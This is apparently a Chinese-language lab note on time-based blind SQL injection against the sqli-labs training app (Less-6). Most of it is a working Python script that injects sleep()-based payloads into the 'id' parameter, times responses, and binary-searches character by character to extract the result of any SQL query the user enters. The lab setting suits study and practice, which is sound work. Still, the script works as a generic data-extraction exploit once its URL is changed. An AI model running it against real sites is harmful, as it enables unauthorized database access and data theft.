时间盲注其实和布尔盲注差不多,就是没回显值,不过可以用页面的返回时间判断sql语句的真假。去晚上找了些脚本,都挺长的,就用之前的布尔盲注的脚本进行修改,把返回值改成返回时间就是了。不过sleep函数里的值挺麻烦的(休眠时间),太短会误判,太长又真的很花时间。在sqlilabs的第6关调了几次,好像0.1秒还可以,暂且先这样设吧。
import requests
import time
def check_res(start_time,end_time):
if end_time-start_time >= 0.1:
return False
else:
return True
def res_length(exp):
length = -1
sess = requests.session()
while True:
sql_exp = "length((%s))>%d" % (exp,length)
url = "http://sqli-labs-master/Less-6/?id=0\" or if((%s),1,sleep(0.1)) --+" % (sql_exp)
start_time = time.time()
res = sess.get(url)
end_time = time.time()
print(time)
print(length)
if not check_res(start_time,end_time):
break
length += 1
return length
def res_result(exp, length):
result = ""
sess = requests.session()
for i in range(length):
left = 0
right = 127
while True:
mid = (left+right) // 2
if mid == left:
result += chr(right)
break
sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
url = "http://sqli-labs-master/Less-6/?id=0\" or if((%s),1,sleep(0.1)) --+" % (sql_exp)
start_time = time.time()
res = sess.get(url)
end_time = time.time()
if check_res(start_time,end_time):
left = mid
else:
right = mid
return result
if __name__ == '__main__':
while True:
exp = input(">>>请输入SQL语句:")
length = res_length(exp)
print("[+]length :%d" % (length))
result = res_result(exp, length)
print("[+]result:%s" % (result))